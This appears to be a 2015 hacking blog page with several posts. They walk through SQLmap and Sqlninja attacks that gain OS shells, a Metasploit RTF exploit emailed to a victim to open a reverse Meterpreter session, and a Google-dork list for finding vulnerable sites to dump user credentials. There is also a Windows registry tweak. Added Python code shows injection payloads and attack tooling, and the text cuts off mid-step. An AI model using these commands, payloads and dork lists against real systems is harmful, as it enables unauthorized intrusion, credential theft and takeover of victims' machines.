Thursday, 21 May 2015

What Is SQL Injection? And How To Use SQL Injection To Hack.

From either the scanning results or from just poking around, you might be able to identify some SQL
injections (SQLi) vulnerabilities. This is great because SQLi vulnerabilities can lead to a full
compromise of the database or of the system itself. Two open source tools that I have found to work
most of the time are SQLmap and Sqlninja. Let’s go through the process from identification to
exploitation.

SQLmap


  • SQLmap is one of my favorite tools for finding SQL injections, manipulating database queries, and dumping databases. It also has additional functionality to get an interactive shell through an injection and can even spawn Meterpreter or a VNC session back to the attacker.
  • In the following examples, I'll show both a GET parameter and a POST parameter example with SQLmap, since they are the most commonly identified types of SQLi. The reason I show both HTTP method attacks is that if you don't have the request properly configured, it is very likely the attack will fail.
  • Here is a look at the help file for SQLmap, as there are a lot of different switches that can be used for SQLi attacks: sqlmap -h

  • GET Parameter Example

     
  • In the following examples, we are going to assume that the SQLi vulnerability is located in a GET parameter within the URL. We want to test every parameter and confirm that the SQLi finding is real. I've seen a good number of false positives from scanner tools, so validation is really the only way to be sure of a finding. Remember that if you do not specify a parameter to test (-p), SQLmap will test every parameter by default.
     
  • Finding if an SQL injection is valid (the result will be the DBMS banner if valid):
    sqlmap -u "http://site.com/info.php?user=test&pass=test" -b
     
  • Retrieving the database username:
    sqlmap -u "http://site.com/info.php?user=test&pass=test" --current-user
     
  • Interactive shell:
    sqlmap -u "http://site.com/info.php?user=test&pass=test" --os-shell
     
  • Some hints and tricks:
    You might need to define which type of database to attack. If you think an injection is possible but SQLmap is not finding the issue, try to set the --dbms=[database type] flag.
     
  • If you need to test an authenticated SQL injection finding, log into the website via a browser and grab the session cookie (you can take it straight from the request in Burp Suite). Then pass the cookie with the --cookie="[COOKIE]" switch (--data is for the POST body, not for the cookie).
     
  • Stuck? Try the command: sqlmap --wizard
     
  • POST Parameter Example

     
  • POST examples are going to mimic GET injections, except for how the vulnerable parameter is passed. Instead of being in the URL, the POST parameters are passed in the data section. This is normally seen with username and passwords as the web servers generally log GET parameters and you wouldn’t want the webserver to log passwords. Also, there are size limitations with GET methods and therefore a lot of data will be passed via POST parameters for larger applications.
     
  • Finding if an SQL injection is valid (the result will be the DBMS banner if valid):
    sqlmap -u "http://site.com/info.php" --data="user=test&pass=test" -b
     
  • Retrieving the database username:
    sqlmap -u "http://site.com/info.php" --data="user=test&pass=test" --current-user
     
  • Interactive shell:
    sqlmap -u "http://site.com/info.php" --data="user=test&pass=test" --os-shell
     
  • If you are able to gain an os-shell, you'll have command line access on the database server with the privileges of the account the database service runs as. In the following example, I was able to find a vulnerable SQLi, gain an os-shell, and run an ipconfig command.
I would spend some time getting used to running different SQLi commands and trying the different switches identified in the help file. If SQLmap fails, it might be your configuration, so make sure to try the Wizard setup (--wizard), too.
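To make concrete what SQLmap is exercising in the GET and POST examples above, here is an added Python example (not part of the original post) that simulates the info.php login with an in-memory SQLite table: a query built by string concatenation falls to a quote-closing payload and to a UNION payload that pulls the DBMS banner (what -b retrieves), while the parameterized version treats the same input as data. The table, its rows and the function names are assumptions made for this example.

```python
import sqlite3

# Constructed stand-in for the site's user table behind info.php?user=...&pass=...
# (table and column names are assumptions made for this example).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("test", "test"), ("admin", "s3cret")])
    return conn


def login_vulnerable(conn, user, pwd):
    """Builds the query by concatenation: the values become SQL syntax.
    Returns the list of matched user names (a non-empty list means 'logged in')."""
    sql = "SELECT user FROM users WHERE user = '%s' AND pass = '%s'" % (user, pwd)
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, user, pwd):
    """Same query with bound parameters: the driver keeps the values out of the
    SQL grammar, so quotes and comment markers in the input stay literal."""
    sql = "SELECT user FROM users WHERE user = ? AND pass = ?"
    return [row[0] for row in conn.execute(sql, (user, pwd))]


# Payloads of the kind SQLmap sends. The leading single quote closes the string
# literal the application opened, which is why the post says to try closing
# the parameter with ticks, quotes or semicolons.
BYPASS_PWD = "x' OR '1'='1"                          # ... AND pass = 'x' OR '1'='1'
BANNER_USER = "' UNION SELECT sqlite_version() -- "  # appends a row carrying the banner


def banner_via_injection(conn):
    """Mimics 'sqlmap -b': a UNION injected into the user parameter returns the
    DBMS version string as if it were a user name. The trailing -- comments out
    the rest of the original WHERE clause."""
    rows = login_vulnerable(conn, BANNER_USER, "irrelevant")
    return rows[0] if rows else None


if __name__ == "__main__":
    db = make_db()
    print("normal login:  ", login_vulnerable(db, "test", "test"))
    print("bypass (vuln): ", login_vulnerable(db, "nobody", BYPASS_PWD))
    print("bypass (safe): ", login_safe(db, "nobody", BYPASS_PWD))
    print("banner (vuln): ", banner_via_injection(db))
```

The bypass works because AND binds tighter than OR, so the injected OR '1'='1' is true for every row; the same strings handed to the parameterized query match nothing, which is the fix the dumped application would need.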

 Sqlninja 

  • Sqlninja is another great SQL injection tool for uploading shells and evading network IDS systems. Note that Sqlninja targets Microsoft SQL Server back ends specifically, whereas SQLmap supports many DBMSs. You might be asking why I would use Sqlninja if I've already become comfortable with SQLmap?
    From many years of experience, I've seen a large number of tests where SQLi was identified by only one tool or the other. This might be because of how each detects blind SQLi, how they upload binaries, IPS signatures that detect one tool but not the other, or how they handle cookies. There are so many different variables that it's smart to always double check your work.
  • Taking a look at the help file with the -h switch, we can see all the different functionality Sqlninja has.

  • The only issue I've had with Sqlninja is that the configuration file is a bit more difficult to set up, and I've never found great or easy to read documentation. So I'll give the same two examples I gave for SQLmap.
     
  • In Sqlninja, you need to mark the vulnerable parameter to inject into with the __SQL2INJECT__ string. This is different from SQLmap, where we didn't need to specify which field to test against. Let's go through a couple of examples, as it should make things much clearer. Before we can use Sqlninja, we need to define the configuration file. This will contain all the information about the URL, the HTTP method, session cookies, and browser agent.
  • Let me show you the easiest way to obtain the information required for Sqlninja. As before, load up Burp Suite and turn on proxy intercept for the request where the vulnerable field is passed. In the following example, we are going to capture requests sent to /wfLogin.aspx and identify the POST parameter values. This is going to have most of the information required for Sqlninja injections, but slight modifications will need to be made to the Burp raw request.
  •  Let’s take a look at one of the requests from Burp that identified a potential SQLi vulnerability.
  • In the next two examples, you’ll see how the most common GET and POST parameters are created. This can be used for any different type of HTTP method, but usually the POST and GET methods will be used.
  • A few things to notice about the original Burp request versus how it is entered in the Sqlninja configuration file: 
    • The request line (GET/POST) needs to be modified to include the full URL. Burp shows only the path, so http://site.com has to be added in front of /wfLogin.aspx.
     
    • You have to define which parameters to fuzz by appending the __SQL2INJECT__ string to them.
     
    • Sometimes with Sqlninja you may need to try the attack by first closing the vulnerable SQL parameter. This can be done with ticks, quotes, or semicolons (the examples below use ';), matching the quoting the original query uses around the value.  
     
  • GET Parameter Example

  • We are going to write the sql_get.conf configuration file to our Kali desktop with two vulnerable parameters. Sqlninja will try to attack both the user and pass fields and try to validate if they are vulnerable. To create/modify the configuration file in a terminal, type:
  • gedit ~/Desktop/sql_get.conf
  • Enter the following into the configuration file and save it:
 --httprequest_start--
 GET http://site.com/wfLogin.aspx?user=test';__SQL2INJECT__&pass=test';__SQL2INJECT__ HTTP/1.0
 Host: site.com
 User-Agent: Mozilla/5.0 (X11; U; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
 Accept: text/xml, application/xml, text/html; q=0.9, text/plain; q=0.8, image/png, */*
 Accept-Language: en-us, en; q=0.7, it;q=0.3
 Accept-Charset: ISO-8859-15, utf-8; q=0.7,*;q=0.7
 Content-Type: application/x-www-form-urlencoded
 Cookie: ASPSESSIONID=3dkDjb3jasfwefJGd
 Connection: close
 --httprequest_end--


  • POST Parameter Example

    A POST request differs from a GET in the fact that the parameters are passed in the data section instead of being part of the URL. In a terminal we need to create the configuration file and modify the
    parameters to inject into. In this example, we will inject into both the username and password:
     
  • gedit ~/Desktop/sql_post.conf
  • Enter the following into the configuration file and save it:
    --httprequest_start--
    POST http://site.com/wflogin.aspx HTTP/1.0
    Host: site.com
    User-Agent: Mozilla/5.0 (X11; U; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
    Accept: text/xml, application/xml, text/html; q=0.9, text/plain; q=0.8, image/png, */*
    Accept-Language: en-us, en; q=0.7, it;q=0.3
    Accept-Charset: ISO-8859-15, utf-8; q=0.7,*;q=0.7
    Content-Type: application/x-www-form-urlencoded
    Cookie: ASPSESSIONID=3dkDjb3jasfwefJGd
    Connection: close

    username=test';__SQL2INJECT__&password=test';__SQL2INJECT__
    --httprequest_end--
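Turning a Burp raw request into the Sqlninja httprequest block by hand is where most mistakes happen (path instead of full URL, marker missing, stale Content-Length). The Python helper below is an added example, not Sqlninja's code or the original post's; it applies the three rules above to a constructed Burp request and emits the configuration block. The http://site.com host, the '; closing prefix and the wfLogin.aspx parameter names follow the examples above; dropping Content-Length is my own choice, because the captured value no longer matches once payloads are appended.

```python
MARKER = "__SQL2INJECT__"


def mark_params(encoded, targets, prefix):
    """Append prefix + marker to each target parameter in a k=v&k=v string.
    Other parameters pass through untouched; values are not re-encoded because
    the Sqlninja block is literal request text."""
    out = []
    for pair in encoded.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        if key in targets:
            value = f"{value}{prefix}{MARKER}"
        out.append(f"{key}={value}")
    return "&".join(out)


def burp_to_sqlninja(raw_request, scheme="http", targets=(), prefix="';"):
    """Convert a Burp raw request into a Sqlninja --httprequest-- block.

    Rules applied: the request line gets the full URL (host taken from the
    Host header); target parameters get prefix + __SQL2INJECT__ (query string
    for GET, body for POST); the closing prefix is chosen by the caller.
    Content-Length is dropped (my choice for this example) because Sqlninja's
    payloads change the body length, so the captured value would be wrong."""
    head, _, body = raw_request.replace("\r\n", "\n").strip("\n").partition("\n\n")
    request_line, *headers = head.split("\n")
    method, target, version = request_line.split()
    host = next(h.split(":", 1)[1].strip() for h in headers
                if h.lower().startswith("host:"))
    path, _, query = target.partition("?")
    if method.upper() == "GET" and query:
        target = f"{path}?{mark_params(query, set(targets), prefix)}"
    body = body.strip()
    if method.upper() == "POST" and body:
        body = mark_params(body, set(targets), prefix)
    headers = [h for h in headers if not h.lower().startswith("content-length:")]
    lines = ["--httprequest_start--", f"{method} {scheme}://{host}{target} {version}"]
    lines += headers
    if body:
        lines += ["", body]  # blank line separates headers from body, as in HTTP
    lines.append("--httprequest_end--")
    return "\n".join(lines) + "\n"


# Constructed Burp capture of the POST to /wfLogin.aspx (all values made up).
BURP_POST = """POST /wfLogin.aspx HTTP/1.0
Host: site.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Cookie: ASPSESSIONID=3dkDjb3jasfwefJGd
Connection: close

username=test&password=test
"""

if __name__ == "__main__":
    conf = burp_to_sqlninja(BURP_POST, targets={"username", "password"})
    print(conf, end="")
    # with open("sql_post.conf", "w") as f:
    #     f.write(conf)
```

Paste Burp's raw request in as-is, list the parameters you want marked, and write the returned text to the .conf file; swap the prefix for ", ; or nothing when the first run in test mode fails.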
     
  •  Executing Sqlninja

    Whether you use a GET or POST method attack, executing the attack is the same. Now that we have created a configuration file, we can run Sqlninja with the following command:
     
  • sqlninja -m t -f ~/Desktop/sql_get.conf
  • This command runs Sqlninja in test mode (-m t) to see if the injection works with the configuration file we just created. If you are lucky and do find a valid SQL injection, you can start to attack the database. In the following example, we are going to exploit our database, find the version, check to see if we are the "sa" account (which has administrative privileges), and see if we have access to a shell.

  • Once we have xp_cmdshell available, we want to test that we have command line access and what privileges we have. In the example below we are exploiting the SQLi vulnerability and testing command line commands.
  • During this specific test (image below), it looks like we might be running commands on the server, but we'd need to validate this. The issue, though, is that after setting up a listener on a server we own on
    the Internet, we don't see any connections from the compromised server outbound. This could be a problem if we wanted to exfiltrate data back to us or download additional tooling. Since the command line console created by Sqlninja doesn't show the responses from commands, we really need to validate that our commands are successfully executing.
  • The best way to check if a command is working is to have tcpdump listen for pings on a server we own that is publicly reachable on the Internet. By running ping commands on the compromised server, we can easily validate whether it can reach us. The reason to use pings is that ICMP is generally allowed outbound and is less likely to trigger IDS/IPS signatures. This can be configured with the following command on an external server owned by the attacker: 
  • tcpdump -nnvXSs 0 -c2 icmp
  • This command will log any pings sent to my server and I’ll be able to validate that the server can talk outbound and that my commands are working. On my compromised SQLi host I execute a simple ping back to my server. If it is successful, tcpdump will see the ICMP request.

  • Command line SQLi attacks can be run with the following command:
  • sqlninja -f [configuration_file] -m c
  • As we can see in the image below, I first tried to run telnet commands back to my server, but that was unsuccessful. I then tried to initiate ping commands back to my server, where tcpdump was listening. In this case, my attack was successful and that proved I could run full commands on this host, but it does not have TCP egress back out (only ICMP made it through).
  • In the image below, the top portion is my server logging pings and the bottom image is the victim host that is vulnerable to SQLi. Although the telnet commands seem to fail, the pings are successful.
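The post validates command execution by watching for the victim's pings with tcpdump. As an added example (not from the original post), the Python below performs the same check against captured tcpdump text: it pulls out ICMP echo requests, counts them per source address, and reports whether the expected victim called back. The sample lines are constructed in the plain one-line format of `tcpdump -nn icmp` rather than the -vXS hex-dump form above, and the addresses are documentation ranges (203.0.113.7 plays the victim, 198.51.100.10 our server).

```python
import re
from collections import Counter

# Constructed one-line tcpdump ICMP records as printed by `tcpdump -nn icmp`.
# Line 4 is unrelated TCP noise, line 2 is our own reply: both must be ignored.
SAMPLE_CAPTURE = """\
13:42:01.100001 IP 203.0.113.7 > 198.51.100.10: ICMP echo request, id 1, seq 1, length 40
13:42:01.100150 IP 198.51.100.10 > 203.0.113.7: ICMP echo reply, id 1, seq 1, length 40
13:42:02.100211 IP 203.0.113.7 > 198.51.100.10: ICMP echo request, id 1, seq 2, length 40
13:42:05.437810 IP 192.0.2.55.51234 > 198.51.100.10.22: Flags [S], seq 12345, win 64240, length 0
13:42:07.000033 IP 192.0.2.99 > 198.51.100.10: ICMP echo request, id 7, seq 1, length 64
"""

ECHO_REQUEST = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) IP (?P<src>[\d.]+) > (?P<dst>[\d.]+): "
    r"ICMP echo request, id (?P<id>\d+), seq (?P<seq>\d+)")


def echo_requests(capture):
    """Yield (timestamp, src, dst, id, seq) for every ICMP echo request line;
    echo replies and non-ICMP traffic do not match the pattern."""
    for line in capture.splitlines():
        m = ECHO_REQUEST.match(line)
        if m:
            yield m["ts"], m["src"], m["dst"], int(m["id"]), int(m["seq"])


def pings_by_source(capture):
    """Count echo requests per source address."""
    return Counter(src for _, src, _, _, _ in echo_requests(capture))


def callback_seen(capture, victim_ip, min_pings=2):
    """True when the victim sent at least min_pings echo requests. Two is a
    sensible floor: the post captures two packets (-c2), and a single stray
    ping from the Internet could just as well be scanning noise."""
    return pings_by_source(capture)[victim_ip] >= min_pings


if __name__ == "__main__":
    print(pings_by_source(SAMPLE_CAPTURE))
    print("victim called back:", callback_seen(SAMPLE_CAPTURE, "203.0.113.7"))
```

Feed it a saved capture (tcpdump -nn icmp > pings.txt) and check callback_seen for the address of the host you ran the ping on; a hit proves both command execution and ICMP egress, exactly the two facts the telnet failure above left open.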


  • If you have gotten this far and you aren’t sure what to do next, you can jump to the Lateral Pass Section to get an idea on next steps. This should give you enough details to help you start testing and practicing on vulnerable frameworks. Of course these are the best scenario options, where the SQLi works without having to configure detailed settings about the database type, blind SQLi type, or other timing type issues.

       


Wednesday, 20 May 2015

Increase Your Computer Speed By Locking (Moving) The Windows Kernel To The Ram.


Many web sites show this tweak. It keeps the Windows kernel in RAM rather than letting it be paged out to the slower page file on the hard disk. You have to have enough RAM to do this; I would suggest at least 4 GB. Some sites state you can do this with less RAM, but a lot depends on how much multitasking you do and how big your open apps are.



Make a backup of your registry before attempting any change in the registry. (Be very careful in the registry, as you can cause a lot of damage here that can render your PC unbootable.)
Go to Start > Run. Type 'regedit' and hit Enter.

In the registry editor go to the following key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management

Double click the DisablePagingExecutive value and change it to "1". This keeps kernel-mode code and drivers resident in RAM instead of letting them be paged out to disk.

Then, in the same key, double click the LargeSystemCache value and change it to "1". This favors the system file cache over application working sets, so on a desktop running memory-hungry applications it can hurt rather than help; revert it if you notice the opposite effect.

Close the editor and reboot Windows. Your computer should perform faster now.

Hack Any Windows 7 Or 8 With Kali And Metasploit (.rtf Method)

Step 1: Start Metasploit

Open a terminal and type: msfconsole

Then set Metasploit to use this exploit by typing:

command: use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof


 

Step 2: Set a Payload

We need to set a payload. In this case, we wish to use Metasploit's powerful Meterpreter to establish a listener on the victim's system. 

command: set payload windows/meterpreter/reverse_tcp

 

Step 3: Show Options

Now, let's look at our options. As you know from my previous Metasploit blogs, every exploit has options, some mandatory and some not. Let's take a look at the options for this exploit by typing: 

command: show options

 

Step 4: Change FILENAME

command: set FILENAME <Your File Name.rtf>

 

Step 5: Set Your Local Host

 

Next we need to set the LHOST or the local host. This will be the system we will be listening from--usually our local system--but it could be any system you want to listen from. We simply need to set the LHOST with the IP address of our listening system, in this case 192.168.1.107.

command: set LHOST 192.168.1.107

(To reach a victim outside your network, set LHOST to your public IP and forward the listener port on your router to your Kali machine.)

  

Step 6: Last Check of Options

Before we exploit the victim's system, let's check to make sure all our options are set properly.

show options

Note in the screenshot that the FILENAME is now set to Kishan.rtf and the LHOST is 192.168.1.107

 

Step 7: Exploit

Now, we are ready to exploit. Simply type:

command: exploit

 You can see that Metasploit has generated a file called Kishan.rtf and placed it at /root/.msf4/local/Kishan.rtf.



Step 8: Send the File to the Victim

Now we need to send this file to the victim through email or another method. The .rtf only carries the stager, so before the victim opens it start a matching listener in Metasploit (the exploit/multi/handler module with the same payload, LHOST and LPORT). Once the victim opens the file in a vulnerable version of Word, Word will hang or crash, leaving us with an active Meterpreter session on the victim's system. With an active Meterpreter session, we have nearly total control or "own" their system.

 

 

Hack Php Sites With SQL Injection


SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection exploits a security vulnerability in an application's software, for example when user input is incorrectly filtered for string literal escape characters embedded in SQL statements, or is not strongly typed and is unexpectedly executed as part of the query. SQL injection is mostly known as an attack vector for websites, but it applies to any application backed by a SQL database. In this guide I will show you how to use SQLMAP on Kali Linux to attack a website (more specifically its database) and extract usernames and passwords.






Step 1: Find a Vulnerable Website

This is usually the toughest bit and takes longer than any other step. Those who know how to use Google Dorks know this already, but in case you don't, I have put together a number of strings that you can search in Google. Just copy and paste any of the lines into Google and it will show you a number of search results:

inurl:item_id=
inurl:review.php?id=
inurl:hosting_info.php?id=
inurl:newsid=
inurl:iniziativa.php?in=
inurl:gallery.php?id=
inurl:trainers.php?id=
inurl:curriculum.php?id=
inurl:rub.php?idr=
inurl:news-full.php?id=
inurl:labels.php?id=
inurl:view_faq.php?id=
inurl:news_display.php?getid=
inurl:story.php?id=
inurl:artikelinfo.php?id=
inurl:index2.php?option=
inurl:look.php?ID=
inurl:detail.php?ID=
inurl:readnews.php?id=
inurl:newsone.php?id=
inurl:index.php?=
inurl:top10.php?cat=
inurl:aboutbook.php?id=
inurl:profile_view.php?id=
inurl:newsone.php?id=
inurl:material.php?id=
inurl:category.php?id=
inurl:event.php?id=
inurl:opinions.php?id=
inurl:publications.php?id=
inurl:product-item.php?id=
inurl:announce.php?id=
inurl:fellows.php?id=
inurl:sql.php?id=
inurl:rub.php?idr=
inurl:downloads_info.php?id=
inurl:index.php?catid=
inurl:galeri_info.php?l=
inurl:prod_info.php?id=
inurl:news.php?catid=
inurl:tekst.php?idt=
inurl:shop.php?do=part&id=
inurl:index.php?id=
inurl:newscat.php?id=
inurl:productinfo.php?id=
inurl:news.php?id=
inurl:newsticker_info.php?idn=
inurl:collectionitem.php?id=
inurl:index.php?id=
inurl:rubrika.php?idr=
inurl:band_info.php?id=
inurl:trainers.php?id=
inurl:rubp.php?idr=
inurl:product.php?id=
inurl:buy.php?category=
inurl:offer.php?idf=
inurl:releases.php?id=
inurl:article.php?ID=
inurl:art.php?idm=
inurl:ray.php?id=
inurl:play_old.php?id=
inurl:title.php?id=
inurl:produit.php?id=
inurl:declaration_more.php?decl_id=
inurl:news_view.php?id=
inurl:pop.php?id=
inurl:pageid=
inurl:select_biblio.php?id=
inurl:shopping.php?id=
inurl:games.php?id=
inurl:humor.php?id=
inurl:productdetail.php?id=
inurl:page.php?file=
inurl:aboutbook.php?id=
inurl:post.php?id=
inurl:newsDetail.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:viewshowdetail.php?id=
inurl:gallery.php?id=
inurl:fiche_spectacle.php?id=
inurl:clubpage.php?id=
inurl:article.php?id=
inurl:communique_detail.php?id=
inurl:memberInfo.php?id=
inurl:show.php?id=
inurl:sem.php3?id=
inurl:section.php?id=
inurl:staff_id=
inurl:kategorie.php4?id=
inurl:theme.php?id=
inurl:newsitem.php?num=
inurl:news.php?id=
inurl:page.php?id=
inurl:readnews.php?id=
inurl:index.php?id=
inurl:shredder-categories.php?id=
inurl:top10.php?cat=
inurl:faq2.php?id=
inurl:tradeCategory.php?id=
inurl:historialeer.php?num=
inurl:show_an.php?id=
inurl:product_ranges_view.php?ID=
inurl:reagir.php?num=
inurl:preview.php?id=
inurl:shop_category.php?id=
inurl:Stray-Questions-View.php?num=
inurl:loadpsb.php?id=
inurl:transcript.php?id=
inurl:forum_bds.php?num=
inurl:opinions.php?id=
inurl:channel_id=
inurl:game.php?id=
inurl:spr.php?id=
inurl:aboutbook.php?id=
inurl:view_product.php?id=
inurl:pages.php?id=
inurl:preview.php?id=
inurl:newsone.php?id=
inurl:announce.php?id=
inurl:loadpsb.php?id=
inurl:sw_comment.php?id=
inurl:clanek.php4?id=
inurl:pages.php?id=
inurl:news.php?id=
inurl:participant.php?id=
inurl:avd_start.php?avd=
inurl:download.php?id=
inurl:main.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:person.php?id=
inurl:viewapp.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=

Initial check to confirm if website is vulnerable to SQLMAP SQL Injection

For every string shown above, you will get hundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection? There are multiple ways, and I am sure people would argue which one is best, but to me the following is the simplest and most conclusive.
Let's say you searched using this string inurl:item_id= and one of the search results shows a website like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15
Just add a single quotation mark ' at the end of the URL. (Just to be clear, " is a double quotation mark and ' is a single quotation mark.)
So now your URL will become like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'
If the page returns an SQL error, the parameter is very likely injectable (the quote broke out of the string literal in the query) and SQLMAP will confirm it. If it loads normally or redirects you to a different page, move on to the next site in your Google search results. Keep in mind that the absence of an error doesn't prove the parameter is safe: blind injections produce no error text and need boolean or time-based tests, which SQLMAP also performs.
See example error below in the screenshot. I’ve obscured everything including URL and page design for obvious reasons.

 

 

Microsoft SQL Server

Server Error in '/' Application. Unclosed quotation mark before the character string 'attack;'.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string 'attack;'.



MySQL Errors

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12
Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 12

Oracle Errors

java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)
Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated



PostgreSQL Errors

Query failed: ERROR: unterminated quoted string at or near “‘’’”
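The single-quote test above relies on recognizing DBMS error text in the response. As an added example (not from the original post), here is a Python fingerprinting routine built from the error strings listed above, plus a baseline comparison: a page is flagged only when the quoted request produces a DBMS error that the unmodified request did not, so sites that always show an error banner are not false positives. The response bodies are constructed snippets abridged from the messages above; the URL and parameter names follow the item.cgi example.

```python
import re
from urllib.parse import urlsplit, urlunsplit, parse_qsl

# Error signatures taken from the messages listed above, one group per DBMS.
DBMS_ERRORS = {
    "Microsoft SQL Server": [
        r"Unclosed quotation mark before the character string",
        r"System\.Data\.SqlClient\.SqlException",
    ],
    "MySQL": [
        r"You have an error in your SQL syntax",
        r"mysql_fetch_array\(\): supplied argument is not a valid MySQL result",
    ],
    "Oracle": [
        r"\bORA-\d{5}\b",  # ORA-00933, ORA-01756, ...
        r"quoted string not properly terminated",
    ],
    "PostgreSQL": [
        r"unterminated quoted string at or near",
        r"Query failed: ERROR:",
    ],
}
COMPILED = {name: [re.compile(p, re.I) for p in pats] for name, pats in DBMS_ERRORS.items()}


def fingerprint_dbms(body):
    """Return the DBMS whose error text appears in body, or None."""
    for name, patterns in COMPILED.items():
        if any(p.search(body) for p in patterns):
            return name
    return None


def quote_param(url, param):
    """Append a single quote to one query parameter, leaving the others alone.
    The post appends it to the last parameter by hand; this works for any of
    them. Values are decoded by parse_qsl and re-emitted as-is."""
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    rebuilt = "&".join(f"{k}={v}'" if k == param else f"{k}={v}" for k, v in pairs)
    return urlunsplit(parts._replace(query=rebuilt))


def looks_injectable(baseline_body, probed_body):
    """Flag only when the quoted request triggers a DBMS error that the normal
    request did not. Returns the DBMS name or None. None does not mean safe:
    blind injections produce no error text and need boolean/time-based tests."""
    dbms = fingerprint_dbms(probed_body)
    if dbms and fingerprint_dbms(baseline_body) != dbms:
        return dbms
    return None


# Constructed response bodies (abridged from the error messages above).
NORMAL_PAGE = "<html><body><h1>Item 15</h1><p>Blue widget, $4.99</p></body></html>"
MSSQL_PAGE = ("Server Error in '/' Application. Unclosed quotation mark before the "
              "character string 'attack;'. Exception Details: "
              "System.Data.SqlClient.SqlException")
MYSQL_PAGE = ("Warning: mysql_fetch_array(): supplied argument is not a valid MySQL "
              "result resource in /var/www/myawesomestore.com/buystuff.php on line 12")
ORACLE_PAGE = "java.sql.SQLException: ORA-00933: SQL command not properly ended"
PGSQL_PAGE = "Query failed: ERROR: unterminated quoted string at or near \"'''\""

if __name__ == "__main__":
    url = "http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15"
    print(quote_param(url, "item_id"))
    for body in (MSSQL_PAGE, MYSQL_PAGE, ORACLE_PAGE, PGSQL_PAGE, NORMAL_PAGE):
        print(looks_injectable(NORMAL_PAGE, body))
```

In practice you fetch the original URL and the quote_param() variant with the same client and cookies and hand both bodies to looks_injectable(); the DBMS name it returns is also what to pass to sqlmap's --dbms switch if detection needs a hint.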



Step 2: List DBMS databases using SQLMAP SQL Injection

As you can see from the screenshot above, I've found a website vulnerable to SQL injection. Now I need to list all the databases on that vulnerable database server. As I am using SQLMAP, it will also tell me which parameter is vulnerable and which injection technique worked.



Run the following command against your vulnerable website:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs
In here:
sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15″)
--dbs = Enumerate DBMS databases
See screenshot below.






This command reveals quite a bit of interesting info:
web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'
So, we now have two databases that we can look into. information_schema is a standard database present on almost every MySQL server. So our interest is in the sqldummywebsite database.



Step 3: List tables of target database using SQLMAP SQL Injection

Now we need to know how many tables the sqldummywebsite database has and what their names are. To find out, use the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables
Sweet, this database has 8 tables.
[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info
and of course we want to check what's inside the user_info table using SQLMAP, as that table probably contains usernames and passwords.



Step 4: List columns on target table of selected database using SQLMAP SQL Injection

Now we need to list all the columns of the target table user_info in the sqldummywebsite database. SQLMAP makes it really easy; run the following command:



sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns



This returns 5 entries from target table user_info of sqldummywebsite database.
[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)



This is exactly what we are looking for: the user_login and user_password columns.

Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection

SQLMAP makes it easy! Just run the following command:
